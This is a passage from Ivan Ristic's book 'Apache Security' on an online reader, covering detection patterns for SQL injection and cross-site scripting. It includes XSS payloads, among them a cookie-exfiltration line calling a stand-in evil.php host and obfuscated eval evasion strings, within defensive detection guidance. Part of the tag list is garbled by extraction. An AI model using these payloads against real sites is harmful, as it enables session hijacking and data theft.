Online Book Reader

Home Category

Choose a category
All
Classic-Fiction

Apache Security - Ivan Ristic [198]

By Root 2085 0

extensions of one kind or another, which require keywords that are often easier to detect. These patterns differ from one database to another, so creating a good set of detection rules requires expertise in the deployed database. Table 12-5 shows some interesting patterns for MSSQL and MySQL.

Table 12-5. Database-specific detection patterns

Pattern

Attack

exec.+xp_

MSSQL. Attempt to execute an extended stored procedure: EXEC xp_cmdshell.

exec.+sp_

MSSQL. Attempt to execute a stored procedure: EXEC sp_who.

@@[[:alnum:]]+

MSSQL. Access to an internal variable: SELECT @@version.

into[[:space:]]+outfile

MySQL. Attempt to write contents of a table to disk: SELECT * FROM '/tmp/users'.

load[[:space:]]+data

MySQL. Attempt to load a file from disk: LOAD DATA INFILE '/tmp/users' INTO TABLE users.

Cross-site scripting attacks

Cross-site scripting (XSS) attacks can be difficult to detect when launched by those who know how to evade detection systems. If the entry point is in the HTML, the attacker must find a way to change from HTML and into something more dangerous. Danger comes from JavaScript, ActiveX components, Flash programs, or other embedded objects. The following list of problematic HTML tags is by no means exhaustive, but it will prove the point:

Executes component when page is loaded (IE only)

...

Executes component when page is loaded

...

Executes applet when page is loaded

Executes code when page is loaded

Executes code when page is loaded<img src="javascript:...">Executes code when page is loadedExecutes code when mouse pointer covers the bold text&{...};Executes code when page is loaded (Netscape only)Your best bet is to try to detect any HTML in the parameters and also the special JavaScript entity syntax that only works in Netscape. If a broad pattern such as <.+> is too broad for you, you may want to list all possible tag names and detect them. But if the attacker can sneak in a tag, then detection becomes increasingly difficult because of many evasion techniques that can be used. From the following two evasion examples, you can see it is easy to obfuscate a string to make detection practically impossible:<img src="javascript:..."><img src="javas X cript:..."> (X is any of the whitespace characters except space)If the attacker can inject content directly into JavaScript, the list of evasion options is even longer. For example, he can use the eval( ) function to execute an arbitrary string or the document.write( ) function to output HTML into the document:document.write('<img src="http://www.example.com/evil.php?' + document.cookie + '">')eval('alert(document.cookie)')eval('al' + 'ert' + '(docu' + 'ment' + '.' + 'co' + 'ok' + 'ie)')eval('\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65' + '\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29')Now you understand why you should not stop attackers too early. Knowing you are being attacked, even successfully attacked, is sometimes better than not knowing at all. A useful collection list of warning patterns for XSS attacks is given in Table 12-6. (I call them warning patterns because you probably do not want to automatically reject requests with such patterns.) They are not foolproof but cast a wide net to catch potential abuse. You may have to refine it over time to reduce false positives for your particular application.Table 12-6. XSS attack warning patterns&#[[0-9a-fA-F]]{2}eval[[:space:]]*(onKeyUp\x5cx[0-9a-fA-F]{2}fromCharCodeonLoad<.+>http-equivonMouseDown<appletjavascript:onMouseOut<divonAbortonMouseOver<embedonBluronMouseUp<iframeonChangeonMove<imgonClickonReset<metaonDblClickonResize<objectonDragDroponSelect<scriptonErroronSubmit</div> </div> <div id="pager" style="text-align: center;margin: auto;"> <a data-ajax="false" class="ui-btn ui-btn-inline ui-corner-all" data-position-to="window" href="/article/apache-security-ivan-ristic-efca82.html">Return Main Page</a> <a data-ajax="false" class="ui-btn ui-btn-inline ui-corner-all" data-position-to="window" href="/read/apache-security-ivan-ristic-efca82/197.html">Previous Page</a> <a data-ajax="false" class="ui-btn ui-btn-inline ui-corner-all" data-position-to="window" href="/read/apache-security-ivan-ristic-efca82/199.html">Next Page</a> </div> <div data-role="footer" id="tail" style="margin-top: 30px;"> <h3>®Online Book Reader</h3> </div> </div> </body>  </html>